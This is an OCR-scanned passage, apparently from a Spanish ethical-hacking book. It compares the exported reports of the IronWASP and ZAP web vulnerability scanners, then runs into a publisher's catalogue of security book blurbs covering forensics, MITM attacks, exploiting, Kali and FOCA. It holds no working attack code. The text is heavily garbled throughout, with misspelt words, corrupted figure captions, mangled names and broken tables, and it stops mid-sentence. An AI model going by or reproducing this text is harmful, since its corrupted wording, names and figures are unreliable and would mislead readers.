Idtv  Severitt*  t'ulnerabllity 
Into  InforTTiaticn  Jindings 

Thines  or  intere>t  for  ’nariual  testing 

The  ibgh  Mediurr.  and  lotv  severity  -v-alr.erabibiy  numbers  ctre  also  evT:  bas-ed  on  !he  conr.de.nte  v.-ith  vrinich  liar. VTA57 has- rey 
Q|  High  CoiUidence  |Q  Medium  Conr.derice  0  ;  lov.*  Confidence 

High  Medium  Low  Info  Test  leads  Total  Hosts 

Fig,  5.01 :  Indice  aporiado  por  fronW.iSP. 

Los  informes  que  ambas  herramientas  presentan  pueden  ser  e.xportados  a  HTML.  Generalmente  este 
tipo  de  infonnes  suele  dar  la  impresion  de  un  volcado  de  informacion.  Es  comiin  que  se  encuentre 
ordenado  en  tablas  y  que  la  informacion  sea  poco  vistosa. 
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Es  impoitante  que  no  scan  infomies  con  mucho  texto  ordenado  en  tablas,  ya  que  la  lectura  no  sera 
sencilla.  Es  irnportante  que,  aunque  este  automatizado,  de  la  sensacion  al  lector  de  tener  un  hilo 
conductor  del  informe. 

IronlVASP  proporciona  la  opcion  de  exportar  la  informacion  en  formato  RTF,  texto  enriqiiecido.  For 
otro  lado  ZAP  permite  la  exportacion  en  formato  XML.  Cuantos  mas  formatos  se  peiTnitan  niejor 
sera  la  integracion  con  otras  tecnologias  que  el  equipo  de  auditoria  disponga  para  el  trabajo. 

En  muchas  ocasiones  se  utilizan  herramientas  como  Metasploit  para  integrar  los  resultados  que  se 
ban  generado  en  otros  escaneres,  con  el  fin  de  alimentar  el  conocimiento  de  la  primera. 

La  presentacion  del  documento,  y  segun  la  comparativa,  Iron  WASP  presenta  un  informe  mas  limpio. 
Se  presenta  un  indice  y  un  resumen  de  lo  que  se  ha  ido  encontrando  durante  el  scan  y  la  criticidad 
de  las  vulnerabilidades  encontradas. 

Ademas,  la  herramienta  presenta  los  recursos  donde  existe  la  vulnerabilidad  y  un  link  el  cual 
peniiite  al  auditor  navegar  por  el  documento.  Iron  WASP  proporciona  infonnacion  sobre  que  tipo  de 
inyecciones  o  payloads  ban  sido  utilizados  para  detectar  las  vulnerabilidades.  Esto  sin  duda  es  un 
punto  a  favor  en  los  reportes  de  herramientas  automaticas. 

A  continuacion  se  ptiede  visual izar  como  se  muestran  las  vulnerabilidades  en  el  informe  que 
IronWASP  proporciona  una  vez  realizado  el  scan. 

Tlie  titles  of  all  the  findings  are  listed  beloiv  categorized  bv  the  host  they  i'.*ere  discov  ered  on.  All  items  in  the  list  beIoi\'  are  links  to  relevai- 
sections  in  the  report. 

http://localhost:8080/ 

■  R*:! : I o ie  File  I:ici*-:ds  round 

1.  .  v\-av5ep.-acti\-e‘‘'RFI-Detect:on-Ev‘aluation-GET-5C0Frror/Ca5e04-RFI-UrlQa5s-FilenameContext-Unr6stricted-HttpLTRL- 
DefaviltEmptv-Input-AnvPatliReq-Read.;5p?target= 

2,  'V‘'avsep'active/‘RFI-Detection-Ex'’aluation-P05T-500Error/Case04-RFI-L’rlQass-FilenameContext-Unrestricted-HttpURL- 
DefaultEinph-Input-AnyPathReq-Read.isp 

Fig.  5.02:  Vulnerabilidad  obtenida  con  IronlVASP. 

Respecto  a  la  cobertura  de  vulnerabilidades  y  la  eficacia  se  puede  hablar  de  diferentes  puntos.  Ambas 
herramientas  cubren  en  su  totalidad,  o  practicamente,  las  vulnerabilidades  del  Top  10  de  OWASP. 

Generalmente,  cuanto  mayor  sea  el  numero  de  pruebas  que  realizan  estos  escaneres,  mayor 
informacion  puede  existir  en  el  infonne. 

Tambien  sera  impoitante  el  porcentaje  de  exito  de  la  herramienta  en  la  deteccion,  ya  que  un  escaner 
podria  implementar  muchos  ataques  y  no  tener  una  deteccion  demasiado  buena. 
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ZAP  Scanning  Report 
Sunimarv'  of  Alerts 


Risk  Level 


Number  of  Alerts 


High  65 

Medium  ^ 

Low  ^6 

Informational 


Alert  Detail 


High  gaming)  ^uencia  de  C^and<^  en  SjMfl«  Cruzad<w  (XSS,'i^^^^ 


Fig.  5.03:  Vulnerabilidades  en  LAP. 
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Estos  libros  se  pueden  obtener  desde  la  web:  Http :  //www.  0x1a1ORD.  com 


Saber  que  ha  pasado  en  un  sistema  es  una  pregunla  de  obligada 
respuesta  en  multiples  situaciones.  Un  ordenador  del  que  se 
sospecha  que  algiiien  esla  teniendo  acceso  al  mismo.  porqiie  se 
esta  diseminando  informacion  que  solo  esta  almacenada  en  ef  un 
empleado  que  sospecha  que  alguien  esta  leyendole  stis  correos 
personates  o  una  organizacion  que  cree  estar  siendo  espiada  por  la 
competencia  son  situaciones  comunes  en  las  empresas. 

En  este  libro  se  describen  los  proccsos  para  realizar  la  captura 
de  cvidencias  en  sistemas  Windows,  desde  la  captura  de  datos 
almacenados,  hasta  la  cxtraccibn  de  elementos  volatiles  como 
ticheros  borrados,  archivos  impresos  o  datos  que  se  encuentran  en 
la  RAM  de  un  sistema.  Todo  ello,  acompahado  de  las  herramientas 
necesarias  para  que  un  tecnico  pueda  realizar  sus  investigaciones. 


El  final  del  aho  2007  trajo  consigo  la  nccesidad  de  react! var 
las  iniciativas  de  aplicacion  de  la  normativa  vigente  en  materia 
de  proteccion  de  datos  de  caracter  personal.  Desde  entonces  la 
actualizacidn  de  los  proyectos  en  curso  y  la  puesta  en  marcha 
de  otros  nuevos  han  constituido  una  prioridad  para  numerosas 
empresas  en  el  Estado  Espahol.  Sin  embargo  la  aplicacidn  de 
la  legislacion  vigente  no  esta  siendo  ni  tan  generalizada  ni  tan 
rigurosa  como  se  esperaba. 

La  lectura  y  consulta  de  este  libro  permitira  al  lector  alejar  miichos 
de  los  'hniedos"  y  dudas  que  ahora  le  asaltan  respecto  de  la  LORD 
y  SLi  niievo  reglamento,  impidiendo  en  muchas  ocasiones  que 
empresas  y  organizaciones  se  encuentren  en  un  situacion  legal 
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Microsoft  Forefront  Threat  Management  Gateway  [TMGJ  2010 
es  la  ultima  evolucion  de  las  lecnologias  Firewall.  Servidor  VPF! 
y  sei-vidor  Cache  de  la  compania  Redmond.  Despues  de  liaber 
convencido  a  muchos  con  los  resiiltados  de  MS  ISA  Seiwer  2006. 
esta  nueva  evolucion  mejora  en  funcionamiento  y  en  caracteristicas 
la  version  anterior. 

En  este  primer  libro  en  Castellano  dedicado  integramente  a  este 
producto  podra  aprender  como  instalarlo,  como  configurarlo  en  la 
empresa  en  configuraciones  stand  alone  y  en  cluster  NLB,  como 
configurar  las  reglas  de  seguridad,  los  servicios  NIS  que  hacen  uso 
de  la  tecnologia  GAPA  o  el  sei^icio  de  proteccion  continua  de  MS 
Forefront  Web  Protection  Sen'ice^  entre  otras  muchas  opciones. 


Microsoft  Share  Point  2010:  Seguridad  es  un  libro  pensado  para 
aquellos  responsables  de  sistemas  o  seguridad,  Arquitectos  IT, 
Admin istradores  o  tecnicos  que  deseen  conoce  como  fortificar  una 
arquiteclura  SharePoifit  Server  2010  o  Share  Point  Foundation 
2010.  El  libro  recoge  desde  los  apailados  de  fortificaeion 
iniciales,  como  la  configuracion  de  los  sistemas  de  autenticacion 
y  aiitorizacion,  la  gestion  de  la  auditoria,  la  creacion  de  planes  de 
contingencia,  la  copia  y  restauracion  de  datos,  la  publicacion  de 
forma  segura  en  Internet  y  la  tecnicas  de  pentesting  y/o  ataques 
a  servidores  SharePoint.  Un  libro  imprescindible  si  tiene  a  cargo 
una  solucion  basada  en  estas  tecnologias, 

Ruben  Alonso  ha  sido  premiado  por  Microsoft  como  MVP  en 
tecnologias  SharePoint. 


El  DM  I  electronico  esta  entre  nosotros.  desde  hace  bastante 
tiempo  pero,  desgraciadamenle,  el  uso  del  mismo  en  su  facela 
electron ica  no  ha  despegado.  Todavia  son  pocas  las  empresas  y  los 
particulares  que  sacan  provecho  de  las  funcionalidades  que  ofrece. 
En  este  libro  Raines  Sarwat.  de  la  empresa  Smart  Access,  desgrana 
los  fiindamentos  tecnologicos  que  estan  tras  el,  y  muestra  como 
utilizar  el  DNl-e  en  enlonios  profesionales  y  particulares.  Desde 
autcnticarse  en  los  sistemas  infonnaticos  de  una  empresa,  hasta 
desarrollar  aplicaciones  que  saquen  partido  del  DNI-e. 

Rallies  Sanvat  es  licenciado  en  Informatica  por  la  Universidad 
Politecnica  de  Madrid y  socio  fundador  y  director  de  SmarlAccess. 
Anteriorinente  ejercio  como  Director  de  Consultoria  en  Microsoft.. 
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Anuario  ilustrado  de  seguridad  informatica,  anecdotas  y 
entrevistas  exclusivas...  Casi  todo  lo  que  ha  ocuiTido  en  seguridad 
en  los  ultimos  doce  ahos,  esta  dentro  de  *'Uno  al  dia:  12  ahos  de 
seguridad  informatica  ". 

Para  celebrar  los  doce  anos  ininteiTumpidos  del  boletin  Una  al 
dia.  hemos  realizado  un  recomdo  por  toda  una  decada  de  virus, 
vLilnerabilidades,  fraudes,  alertas,  y  reflexiones  sobre  la  seguridad 
en  Internet.  Desde  una  perspectiva  amena  y  entretenida  y  con 
un  diseho  sencillo  y  directo.  Los  12  ahos  de  Una  al  dia  sirven 
de  excusa  para  un  libro  que  esta  compuesto  por  material  nuevo, 
revisado  y  redactado  desde  la  perspectiva  del  tiempo.  Ademas  de 
las  entrevistas  exclusivas  y  las  anecdotas  propias  de  Hispasec. 


La  informacion  es  clave  en  la  preparacion  de  un  test  de  penetracion. 
Sin  ella  no  es  posible  detemiinar  que  atacar  ni  como  hacerlo.  Y  los 
buscadores  se  han  convertido  en  heiramientas  fundamcntales  para 
la  mineria  de  datos  y  los  procesos  de  inteligencia.  Sin  embargo, 
pese  a  que  las  tecnicas  de  Google  Hacking  lleven  ahos  siendo 
Litilizadas,  quiza  no  hayan  sido  siempre  bien  tratadas  ni  transmitidas 
al  publico.  Limitarse  a  emplear  Google  Dorks  conocidos  o  a  usar 
heiTamienlas  que  automaticen  esta  tarea  es.  con  respecto  al  uso  de 
los  buscadores,  lo  mismo  que  usar  una  herramienta  como  Nessus. 
o  quiza  el  autopwn  de  Metasploit,  y  pensar  que  se  e.sta  realizando 
un  test  de  penetracion.  Por  supuesto,  estas  herramientas  son  utiles, 
pero  se  debe  ir  mas  alia,  comprender  los  problemas  encontrados. 
ser  capaces  de  detcctar  otros  nuevos...  y  combinar  herramientas. 


En  este  libro  podra  ver  y  conocer,  desde  la  experiencia  profesional 
en  el  mundo  del  e-crime,  como  se  organizan  las  estafas,  que 
herramientas  se  utilizan  y  cuales  son  los  mecanismos  existentes 
para  conseguir  transformar  en  dinero  contante,  el  capital  robado 
digilalmente  a  traves  de  Internet.  Un  te.xto  imprescindible  para 
conocer  a  lo  que  todos  nos  enfrentamos  en  Inteimet  hoy  en  dia  y 
asi  poder  tomar  las  medidas  de  seguridad  apropiadas. 

Dani  Creus  y  Mikel  Gastesi  forman  parte  de  un  equipo 
multidisciplinar  de  reconocidos  especialistas  en  e-crime  y 
seguridad  en  S21sec.  Entre  sus  funciones  deslacan  las  tareas  de 
analisis  e  investigacion  de  temas  relacionados  con  la  seguridad  y 
fraudes  electronicos. 
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Maxima  Seguridad  en  Windows: 
Secretos  Tecnicos 

2*  Eiliadn.  Revtsatfa  y  ampliada. 

Sergio  dc  los  Santos 


Cohnbate  las  araencaas  dt  hoy  en  Windows 


Hoy  en  dia  no  surrimos  las  mismas  amenazas  (ni  en  cantidad  ni 
en  calidad)  que  hace  algunos  anos.  Y  no  sabemos  cuales  seran  los 
retos  del  maiiana.  Hoy  el  problema  mas  grave  es  mitigar  el  impacto 
caiisado  por  las  vulnerabilidades  en  el  software  y  la  complejidad 
de  los  prograinas.  Y  eso  no  se  consigue  con  una  guia  ‘"tradicional”. 
Y  mucho  menos  si  se  perpetuan  las  recomendaciones  “de  toda 
la  vida”  como  “cortafnegos”,  “antivirus”  y  “sentido  comun”. 
^Acaso  no  disponemos  de  otras  annas  mucho  mas  potentes?  No. 
Disponemos  de  las  herramientas  “tradicionales”  muy  mejoradas, 
cierto,  pero  tambien  de  otras  tecnologias  avanzadas  para  mitigar  las 
amenazas.  El  problema  es  que  no  son  tan  conocidas  ni  simples.  Por 
tanto  es  necesario  leer  el  manual  de  instrucciones,  entenderlas...  y 
aprovecharlas... 


Hacking  y  seguridad 
en  comunicaciones  moviles 
GSM/GPRS/UMTS/LTE 

3os6  Pic6  Garcia 
David  Pirez  Conde 
^  2*  Edldftn.  Raviuda  y  ampliada 


Mas  de  3.000  millones  de  usuarios  en  mas  de  200  paises  utilizamos 
diariamente  las  comunicaciones  moviles  GSh4/GPRS/Uh4TS 
(2G/3G)  para  llevar  a  cabo  conversaciones  y  transferencias  dc 
datos.  Pero,  <[.son  seguras  estas  comunicaciones?.  En  los  ultimos 
ahos  se  han  hecho  piiblicos  multiples  vulnerabilidades  y  ejemplos 
de  ataques  practices  contra  GSM/GPRS/UiVfTS  que  han  puesto  en 
evidencia  que  no  podemos  simplemente  confiar  en  su  seguridad.. 

Desciibra  en  esle  libro  cuales  son  las  vulnerabilidades  y  los 
ataques  contra  GSM/GPRS/UiVfTS  (2G/3G)  y  el  estado  respecto  a 
la  nueva  tecnologia  LTE,  comprenda  las  tecnicas  y  conocimientos 
qiie  subyacen  tras  esos  ataques  y  conozca  que  puede  hacer  para 
proteger  sus  comunicaciones  moviles. 


Esquema  Nacional  de  Seguridad 
con  Microsoft* 


Juan  Luis  Garcia  Rambla 
Juliiin  Blizquez  Garda 
Chema  Alonso 
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Microsott 


La  Administracion  Espahola  lidera  iin  encomiable  esluerzo  hacia 
el  DesaiTollo  de  la  Sociedad  dc  la  Informacion  en  Espaha,  asi 
como  en  el  uso  oplimo  de  las  tecnologias  de  la  Informacion  en  pro 
de  una  prestacion  de  servicios  mas  eficiente  hacia  los  ciudadanos. 
Aunqiie  esle  tipo  de  contenidos  no  siempre  son  faciles  de  tratar 
sin  caer  en  un  excesivo  dogmatismo,  si  es  cierto  que  en  el  marco 
de  la  Ley  11/2007  del  22  de  Junio,  de  acceso  electronico  de  los 
ciudadanos  a  los  Servicios  Publicos,  se  anuncio  la  creacion  de  los 
Esqiiemas  Nacionales  de  Interoperabilidad  y  de  Seguridad  con  la 
mision  de  garantizar  un  derecho  ciudadano,  lo  que  sin  duda  es  un 
reto  y  unaresponsabilidad  de  primera  magnitud.  Este  manual  sirve 
para  facilitar  a  los  responsables  de  seguridad  el  cumplimiento  de 
los  aspectos  tecnologicos  derivados  del  cumplimiento  del  ENS. 


Libras  piiblicados 
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No  es  de  extrahar  que  los  programas  contengan  fallos,  errores, 
que,  bajo  determinadas  circunstancias  los  hagan  funcionar  de 
forma  exlrana.  Que  los  conviertan  en  algo  para  lo  que  no  estaban 
disenados.  Aqui  es  donde  entran  en  juego  los  posibles  atacantes. 
Pentesters,  auditores,...  y  ciberdelincuentes.  Para  la  organ izacion, 
mejor  que  sea  uno  de  los  primeros  que  uno  de  los  ultimos.  Pero  para 
laaplicacion,  que  no  entra  en  valorar  intenciones,  no  hay  diferencia 
entre  ellos.  Simplemente,  son  usuarios  que  hablan  un  extraho 
idioma  en  que  los  errores  se  denominan  “vulnerabilidades”,  y  una 
aplicacion  defectuosa  puede  terminal*  convirtiendose,  por  ejemplo, 
en  una  interfaz  de  usuario  que  le  pennita  interactuar  directamente 
con  la  base  de  datos.  Y  basta  con  un  unico  error. 


Las  redes  de  datos  IP  hace  mucho  tiempo  que  gobiernan  nuestras 
sociedades.  Empresas,  gobiemos  y  sistemas  de  interaccion 
social  se  basan  en  redes  TCP/IP.  Sin  embargo,  estas  redes  tienen 
vulnerabilidades  que  pueden  ser  aprovechadas  por  un  atacante 
para  robar  contrasehas,  capturar  conversaciones  de  voz,  mensajes 
de  coiTeo  electronico  o  informacion  transmitida  desde  servidores. 
En  este  libro  se  analizan  como  tlincionan  los  ataques  de  man  in 
the  middle  en  redes  IPv4  o  /Pvd,  como  por  medio  de  estos  ataques 
se  puede  crakear  una  conexion  VPN  PPTI\  robar  la  conexion  de 
un  usuario  al  Active  Directoiy  o  como  suplantar  identificadores 
en  aplicaciones  para  conseguir  perpetrar  una  intrusion  ademas  del 
ataque  SLAAC.  el  funcionamiento  de  las  tecnicas  ARP-Spoofing. 
Neighbor  Spoofing  en  IPv6.,  etcetera. 


Hoy  dia  es  innegable  el  imparable  crecimiento  que  han  tenido  las 
tecnologias  de  los  dispositivos  moviles  en  los  ultimos  ahos.  El 
iiLimero  dQ  smartphones,  tablets,  etcetera  han  aumentado  de  manera 
exponencial.  Esto  ha  sido  asi,  hasta  tal  punto  que  actualmente  estos 
dispositivos  se  han  posicionado  como  tecnologias  de  maxima 
prioridad  para  muchas  empresas. 

Con  este  libro  se  pueden  adquirir  los  conocimientos  necesarios 
para  desarrollar  aplicaciones  en  iOS,  guiando  al  lector  para  que 
aprenda  a  utilizar  las  herramientas  y  tecnicas  basicas  para  iniciarse 
en  el  mundo  iOS.  Se  pretende  sentarunas  bases,  de  manera  que  al 
finalizar  la  lectura.  el  lector  pueda  convertirse  en  desarrollador  iOS 
y  enfrentarse  a  proyectos  de  este  sistema  operativo  por  si  mismo. 


I 
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Ethical  Hacking:  Teoria  y  practica  para  la  realizacidn  c/e  iin  peiitesting 


Hoy  en  dia  la  administracion  de  los  sislemas  es  de  vital  importancia 
en  toda  empresa  moderna.  PowerShell  ofrece  al  administrador  la 
posibilidad  de  autoinatizar  las  tareas  cotidianas  proporcionando 
un  potente  lenguaje  de  scripting.  El  libro  esta  estnictiirado  en 
distintas  teinaticas,  que  ofrecen  al  lector  una  introduccion  a  la 
interaccion  con  la  potente  linea  de  comandos  de  Microsoft^  las 
bases  y  pilares  para  el  desaiTollo  de  potentes  scripts  seguros,  y  la 
gestion  de  prodiictos  de  Microsoft  desde  PowerShcif  como  son 
Hyper- V,  Active  Direct oiy^  SharePoinL  SOL  Sender  o  IIS.  Otro 
de  los  aspectos  a  tratar  es  la  segiiridad.  El  enfoque  practice  del 
libro  ayuda  al  administrador,  a  entender  los  distintos  y  variados 
conceptos  que  ofrece  PowerSfiell. 


Windows  Server  2012 
para  IT  Pros 

ContMrt  Piiti 
Fi^nclMO  AIocim  Franco 
AtejAixtro  Remondo  AtvAru 
ScrQio  Sfln  HoiiMn  Moreno 
Ciitoii  Atvarex  Haflln 
ChcmA  Atonvn 


Windows  Server  2012 


Microsoft  Windows  Sower  2012  ha  llegado  con  novedades  cuyo 
objetivo  es  simplificar  las,  cada  vez  mas,  complejas  tareas  de 
los  administradores  y  profesionales  IT.  En  el  presente  libro 
se  recogen  la  gran  mayoria  de  dichas  novedades  entre  las  que 
destacan  la  version  3.0  de  Hyper-V\  el  servidor  de  virtualizacion 
de  Micro.soft,  el  almacenamiento  con  sli  nucvo  sistcma  de  archivos 
y  sus  propiedades.  las  mejoras  y  nuevas  caracteristicas  de  Active 
Directoiy,  DNS  y  DHCP,  las  novedosas  formulas  de  despliegue 
eficiente,  la  ampliacion  y  mejora  de  la  linea  de  comandos 
Microsoft  Windows  PowerSheU,  y  como  no,  la  seguridad,  un  pilar 
basico  en  la  estaictura  de  los  productos  Microsoft  La  idea  del  libro 
es  presentar  las  novedades  y  ahondar  en  los  conceptos  principales. 


Metasploit 

para  Pentesters 

2*  EdiciAn 


La  seguridad  de  la  informacion  es  uno  de  los  mercados  en  auge  en 
la  Informatica  hoy  en  dia.  Los  gobiernos  y  empresas  valoran  sus 
activos  por  lo  que  deben  protegerlos  de  accesos  ilicitos  mediante 
el  uso  de  auditorias  que  proporcionen  un  status  de  seguridad  a 
nivel  organizativo.  El  pentesting  forma  parte  de  las  auditorias 
de  seguridad  y  proporciona  un  conjunto  de  pruebas  que  valoren 
el  estado  de  la  seguridad  de  la  organizacion  en  cieitas  fases. 
Metasploit  es  una  de  las  herramientas  mas  utilizadas  en  procesos 
de  pentesting  ya  que  contempla  distintas  fases  de  un  test  de 
intrusion.  Con  el  presente  libro  se  pretende  obtener  una  vision 
global  de  las  fases  en  las  que  Metasploit  puede  ofrecer  su  potencia 
y  flexibilidad  al  servicio  del  hacking  etico. 


Libros  publicados 


Microhistorias: 
anecdotas  y  curiosidades 
de  la  Informatica 

RafACl  Troncoso 
Fnindsco  3osA  Ramirci 
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(,Sabias  Steve  Jobs  le  llevo  en  persona  un  ordenador  Macintosh 
a  Yoko  Ono  y  tambien  a  Mick  dagger?  que  Jc/v  Miner,  el  genio 
que  creo  el  Amiga  1000  tenia  una  perrita  que  tomaba  parte  en 
algunas  de  las  decisiones  de  disefio  de  este  ordenador?  que 
Xenix  fiie  el  sistema  UNIX  mas  usado  en  los  80s  en  ordenadores  y 
que  era  propiedad  de  Microsoft! 

Estas  son  solo  algunas  de  las  historias  y  anecdotas  que  encontraras 
en  este  libro  de  Microhistorias.  LJna  parte  importante  de  las  cuales 
tienen  como  protagonista  a  los  miembros  de  Microsoft  y  de  Apple. 

Historias  de  hackers,  phreakers,  programadores  y  disehadores 
CLiya  constancia  y  sabiduria  nos  sirven  de  inspiracion  y  de  ejemplo 
para  nuestros  proyectos  de  hoy  en  dia. 


Hacker  Epico 


BkVuRO 


Angel  Rios,  auditor  de  una  empresa  puntera  en  el  sector  dc 
la  seguridad  informatica  se  prepara  para  acudir  a  una  cita  con 
Yolanda,  antigua  compahera  de  clase  de  la  que  siempre  ha  estado 
enamorado.  Sin  embargo,  ella  no  esta  interesada  en  iniciar  una 
rclacion;  solo  quierc  que  le  ayude  a  descifrar  un  misterioso 
archivo.  Angel  se  ve  envuelto  en  una  intriga  quo  complicara  su 
vida  y  lo  expondra  a  tin  grave  peligro.  Unicamente  contara  con  sus 
conocimientos  de  hacking  y  el  apoyo  de  su  amigo  Marcos. 

Mezcla  de  novela  negra  y  manual  tccnico,  este  libro  aspira 
a  entretener  e  infonnar  a  partes  iguales  sobre  un  mundo  tan 
apasionante  como  es  el  de  la  seguridad  informatica.  Tecnicas  de 
hocking  web.  sistemas  y  analisis  forense,  son  algunos  de  los  temas 
que  se  tratan  con  total  rigor  y  excelentemente  documentados. 


La  evolucion  dc  VOIP  ha  sido  considerable,  siendo  hoy  dia 
una  alternativa  muy  utilizada  como  solucion  unica  de  telefonia 
en  muchisimas  empresas.  Gracias  a  la  expansion  de  Internet  y 
a  las  redes  de  alta  velocidad,  llegara  un  momento  en  el  que  las 
lincas  telefonicas  convencionales  scan  totalmente  sustituidas  por 
sistemas  de  VOIP,  dado  el  ahorro  economico  no  solo  en  llamadas 
sino  tambien  en  infraestructura. 

El  gran  problema  es  la  falta  de  concienciacion  en  seguridad.  Las 
empresas  aprenden  de  los  errores  a  base  de  pagar  elevadas  facturas 
y  a  causa  de  sufrir  intrusiones  en  sus  sistemas. 

Este  libro  muestra  como  hacer  un  test  de  penetracion  en  un  sistema 
de  VOIP  asi  como  las  herramientas  mas  utilizadas  para  atacarlo, 
repasando  ademas  los  fallos  de  configuracion  mas  comunes. 
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Ethical  Hacking:  Teona  y  praciica  para  la  realizaclon  de  un  pen  testing 


Wardog  y  el  mundo 

Miguel  Angel  Marene 


taxVuRD 


Desarrollo  de  apiicaciones 
Android  seguras 

Miguel  Angel'Hoi  rnn 


Clfrado  de  las  comunicaciones  digitales 
De  la  cifra  clasica  al  algorltmO'RSA 


^VHas  pcnsado  alguna  vez  por  que  cono  el  infoiTnatico  tiene  siempre 
esa  cara  de  orco?  ^Por  que  siempre  esta  enfadado?  ^Por  que  no  se 
relaciona  con  la  gente  de  la  oficina? 

Yo  te  lo  digo:  por  tu  culpa.  Por  vuestra  culpa.  Por  las  burradas 
que  haceis.  Porque  no  os  podeis  estar  quietecitos,  no...  Porque  os 
creeis  que  el  informatico  tiene  la  solucion  para  todo. 

Pasa,  pasa,  y  enterale  de  que  pasa  por  la  cabeza  de  Wardog,  un 
administrador  de  sistemas  renegado,  con  afan  de  venganza,  con 
maldad  y  con  mala  hostia. 

Wardog y  e!  mundo  es  el  producto  de  anos  de  exposicion  a  liisers 
dotados  de  estupidez  toxica,  de  mala  baba  destilada  y  acidez  de 
estomago.  Y  cafe  en  cantidades  malsanas. 


Actualmente.  el  mundo  de  las  apiicaciones  moviles  es  uno  de  los 
sectores  que  mas  dinero  mucve  en  el  mercado  de  la  infomiatica. 
Tener  conocimientos  de  programacion  en  estas  plataformas 
moviles  es  una  garantia  para  poder  encontrar  empleo  a  dia  de  hoy. 

“Desarrollo  de  apiicaciones  Android  seguras”  pretende  inculcar 
al  lector  una  base  solida  de  conocimientos  sobre  programacion 
en  la  plataforma  movil  con  mayor  cuota  de  mercado  del  mundo: 
Android.  Mediante  un  enfoqiie  eminentemente  practice,  el  libro 
guiara  al  lector  en  el  desarrollo  de  las  funcionalidades  mas 
demandadas  a  la  bora  de  desan'ollar  una  aplicacion  movil.  Ademas 
se  pretende  educar  al  programador  e  introducirle  en  la  utilizacion 
de  tecnicas  de  diseho  que  modelen  apiicaciones  seguras,  en  la  parte 
de  almacenamiento  de  datos  y  en  la  parte  de  comunicaciones. 


Este  libro  se  dedica  especialmente  a  dos  paradigmas  de  la 
criptogratTa:  la  clasica  y  RSA.  Ambos  los  trata  a  fondo  con  el 
animo  de  convertirse  en  uno  de  los  documentos  mas  completes  en 
esta  tematica.  Para  conseguir  este  irabajo  el  texto  presentado  toma 
como  referencia  trabajo  previo  de  los  autores,  complementandolo 
y  orientandolo  para  hacer  su  lectura  mas  asequible. 

El  tecnico  o  experto  en  seguridad  tendra  especial  interes  por  el 
sistema  RSA,  aunque  le  venga  muy  bien  recordar  sus  inicios  en 
la  criptografia  como  texto  de  amena  lectura  y,  por  su  parte,  el 
lector  no  experto  en  estos  temas  criptologicos  pero  si  interesado, 
seguramente  le  atraiga  inicialmente  la  criptografia  clasica  por  su 
sencillez  y  sentido  historico. 


Libras  publicados 


Este  libro  trata  sobre  la  securizacion  de  entomos  Linux  siguiendo 
el  modelo  de  Defensa  en  Profundidad.  Es  decir.  diferenciando  la 
infraestructura  en  diferentes  capas  que  deberan  ser  configuradas 
de  fonna  adecuada,  teniendo  como  principal  objetivo  la 
seguridad  global  que  proporcionaran.  Durante  el  transcurso  de 
esta  lectura  se  ofrecen  bases  teoricas,  ejemplos  de  configuracioii 
y  funcionamiento,  ademas  de  buenas  practicas  para  tratar  dc 
mantener  un  entomo  lo  mas  seguro  posible.  Sin  duda.  los  entomos 
basados  en  Linux  ofrecen  una  gran  flexibilidad  y  opciones,  por  lo 
que  se  ha  optado  por  trahajar  con  las  tecnologias  mas  comunes  y 
utilizadas.  En  definitiva,  este  libro  se  recomienda  a  todos  aquellos 
que  deseen  reforzar  conceptos,  asi  como  para  los  que  necesiten  una 
base  desde  la  que  partir  a  la  hora  de  securizar  un  entorno  Linux. 


A  di'a  de  hoy  se  han  vendido  mas  de  500  millones  de  dispositivos 
iOS  y  aunque  la  seguridad  del  sistema  ha  mejorado  con  cada 
version  todavia  se  pueden  encontrar  vulnerabilidades  a  explotar. 
Las  auditorias  de  seguridad  en  empresas  cada  vez  se  encuentran  con 
mas  dispositivos  iOS  entre  sus  objetivos,  ya  que  los  empleados  los 
Litilizan  en  sus  puestos  de  trabajo,  lo  que  hace  que  haya  que  pensar 
en  ellos  como  posibles  riesgos  de  seguridad.  En  este  libro  sc  han 
Juntado  un  nulrido  grupo  de  expeitos  en  seguridad  en  la  materia 
para  recopilar  en  un  texto.  todas  las  formas  de  atacar  un  terminal 
iPhone  o  iPad  de  un  usuario  detereminado.  Tras  leer  este  libro,  si 
un  determ inado  usuario  tiene  un  iPhone  o  un  iPad,  seguro  que  al 
lector  se  le  ocurren  muchas  formas  de  conseguir  la  informacion 
que  en  el  se  guarde  o  de  controlar  lo  que  con  el  se  hace. 


Pentesting  con  Kali 


Cermin  SAnchei  Carets 
JOM  MlgtMl  SotUno  de  Cimatji 


Kali  Linux  ha  renovado  el  espiritu  y  la  estabilidad  de  backtrack 
gracias  a  la  agrupacion  y  seleccion  de  herramienias  que  son 
utilizadas  diariamente  por  miles  de  auditores.  En  Kali  Linux  se 
han  elim inado  las  herramientas  que  se  encontraban  descatalogadas 
y  se  han  afinado  las  versiones  de  las  herramientas  top.  La 
cantidad  de  estas  es  lo  que  situa  a  Kali  Linux,  como  una  de  las 
mejores  distribuciones  para  auditoria  de  seguridad  del  mundo. 
El  libro  plantea  un  enfoque  eminentemente  praclico,  pnorizando 
los  escenarios  reproducibles  por  el  lector,  y  ensefiando  el  uso 
de  las  heiTamientas  mas  utilizadas  en  el  mundo  de  la  auditoria 
infomiatica.  Kali  Linux  tiene  la  mision  de  sustituir  a  la  distribucion 
de  seguridad  por  exeelencia,  y  como  se  puede  visualizar  en  este 
libro  tiene  razones  sobradas  para  lograrlo. 


Elhical  Hacking:  Teoria  y  prdc flea  para  la  realizacion  de  im  pentesfing 


El  exploiting  es  el  aite  de  convertir  una  vulnerabilidad  o  brecha 
de  seguridad  en  una  entrada  real  hacia  un  sistema  ajeno.  Cuando 
cientos  de  noticias  en  la  red  hablan  sobre  '‘una  posible  ejecucion 
de  codigo  arbitrario”,  el  exploiter  es  aquella  persona  capaz  de 
desarrollar  todos  los  detalles  tecnicos  y  complejos  elementos 
que  hacen  realidad  dicha  afirmacion.  El  objetivo  es  provocar, 
a  traves  de  un  fallo  de  programacion,  que  una  aplicacion  haga 
cosas  para  las  que  inicialmente  no  eslaba  diseiiada,  pudiendo 
tomar  asi  posterior  control  sobre  un  sistenia.  Desde  la  perspectiva 
de  un  hacker  etico,  este  libro  le  brinda  todas  las  habilidades 
necesarias  para  adentrarse  en  el  in  undo  del  exploiting  y  hacking 
de  aplicaciones  en  el  sistema  operativo  Linux.  Conviertase  en  un 
ninja  de  la  seguridad,  aprenda  el  Kung  Fu  de  los  hackers. 


La  herramienla  FOCA  es  una  utilidad  pensada  por  pentesiers  que  hacen 
pentesting.  Eslo  hacc  que  la  heiTamienta  este  llcna  de  opciones  que  le 
seran  de  exlremada  utilidad  si  vas  a  necesitar  hacer  una  auditoria  de 
